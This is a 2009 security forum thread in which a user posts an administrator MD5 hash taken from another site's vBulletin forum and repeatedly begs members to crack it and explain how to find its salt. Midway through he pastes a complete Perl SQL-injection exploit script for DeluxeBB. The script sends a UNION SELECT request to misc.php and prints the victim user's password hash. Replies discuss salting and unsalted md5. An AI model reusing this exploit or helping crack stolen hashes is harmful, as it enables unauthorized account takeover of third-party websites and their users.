 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
PLZ HELP !! CRACK ADMIN PASSWORD !! |
 |
 Posted: Sat Jan 24, 2009 10:16 am |
 |
|
| BenMix2 |
| Advanced user |
 |
|
| Joined: Jan 08, 2009 |
| Posts: 65 |
|
|
|
 |
|
 |
|
I have admin MD5 hash from this forum: www.********.net
its vbulletin 3.6.8 and i Dont know how i creat salt..
Here is the hash: 86139dbe2f4b548f11a61a44d3289be1
PLz crack and give me the password =[
(sorry my bad english)
[edited by waraxe - do not post here real URL-s!] |
|
|
|
|
| Posted: Sat Jan 24, 2009 1:26 pm |
|
|
| gyan007 |
| Advanced user |
|
|
| Joined: Oct 17, 2008 |
| Posts: 106 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Sat Jan 24, 2009 1:31 pm |
|
|
| BenMix2 |
| Advanced user |
|
|
| Joined: Jan 08, 2009 |
| Posts: 65 |
|
|
|
|
|
|
|
but how i creat\find salt?
I even do not know what this |
|
|
|
|
| Posted: Sun Jan 25, 2009 3:44 pm |
|
|
| BenMix2 |
| Advanced user |
|
|
| Joined: Jan 08, 2009 |
| Posts: 65 |
|
|
|
|
|
|
|
*UP*
Plz help  |
|
|
|
|
| Posted: Sun Jan 25, 2009 4:51 pm |
|
|
| x3roconf_ |
| Advanced user |
|
|
| Joined: May 01, 2008 |
| Posts: 101 |
|
|
|
|
|
|
|
Do NOT post urls to vuln sites. It's not allowed here for security reasons.  also I would like to ask how you got that hash? If you were able to get that hash getting salt is not a big problem.  |
|
|
|
|
| Posted: Sun Jan 25, 2009 5:08 pm |
|
|
| BenMix2 |
| Advanced user |
|
|
| Joined: Jan 08, 2009 |
| Posts: 65 |
|
|
|
|
|
|
|
But what this is salt?
i have hash from exploit script.. |
|
|
|
|
| Posted: Sun Jan 25, 2009 5:47 pm |
|
|
| gyan007 |
| Advanced user |
|
|
| Joined: Oct 17, 2008 |
| Posts: 106 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Wed Jan 28, 2009 2:15 pm |
|
|
| BenMix2 |
| Advanced user |
|
|
| Joined: Jan 08, 2009 |
| Posts: 65 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Wed Jan 28, 2009 4:43 pm |
|
|
| tehhunter |
| Valuable expert |
|
|
| Joined: Nov 19, 2008 |
| Posts: 261 |
|
|
|
|
|
|
|
| No. It is made 88^3 times harder to find a password without a salt and frankly I don't even want to try configuring a program for such a fruitless task. You're out of luck unless we get the accompanying salt. |
|
|
|
|
| Posted: Wed Jan 28, 2009 5:40 pm |
|
|
| BenMix2 |
| Advanced user |
|
|
| Joined: Jan 08, 2009 |
| Posts: 65 |
|
|
|
|
|
|
|
but How I will obtain a salt?
plz give me a guide |
|
|
|
|
| Posted: Wed Jan 28, 2009 5:49 pm |
|
|
| tehhunter |
| Valuable expert |
|
|
| Joined: Nov 19, 2008 |
| Posts: 261 |
|
|
|
|
|
|
|
| BenMix2 wrote: | but How I will obtain a salt?
plz give me a guide |
First you gotta tell us how you got this hash so we know how to help you. |
|
|
|
|
|
|
|
|
| Posted: Wed Jan 28, 2009 6:02 pm |
|
|
| BenMix2 |
| Advanced user |
|
|
| Joined: Jan 08, 2009 |
| Posts: 65 |
|
|
|
|
|
|
|
i have the hash from this script:
| Code: | #!/usr/bin/perl
use IO::Socket;
print q{
############################## ########################
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
############################## ########################
};
if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid
perl dbbxpl.pl www.nUBo.com /forum/ 1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "misc.php?sub=profile&name=0') +UNION+SELECT+0,pass,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0+FROM%20deluxebb_u sers%20WHERE%20(uid='".$user ;
print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n"; |
plz help me now |
|
|
|
|
|
|
|
|
| Posted: Wed Jan 28, 2009 6:05 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| If it's DeluxeBB, then there is no salt, just plain old md5. |
|
|
|
|
| Posted: Wed Jan 28, 2009 6:22 pm |
|
|
| one23 |
| Advanced user |
 |
|
| Joined: Dec 12, 2008 |
| Posts: 98 |
|
|
|
|
|
|
|
EDIT :
I think Waraxe iS Right ! |
|
Last edited by one23 on Wed Jan 28, 2009 6:27 pm; edited 2 times in total |
|
|
|
| Posted: Wed Jan 28, 2009 6:22 pm |
|
|
| BenMix2 |
| Advanced user |
|
|
| Joined: Jan 08, 2009 |
| Posts: 65 |
|
|
|
|
|
|
|
| waraxe wrote: | | If it's DeluxeBB, then there is no salt, just plain old md5. |
its no DeluxeBB this is vbulletin.
plz crack it |
|
|
|
|
www.waraxe.us Forum Index -> MD5 hashes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 89
Members: 0
Total: 89
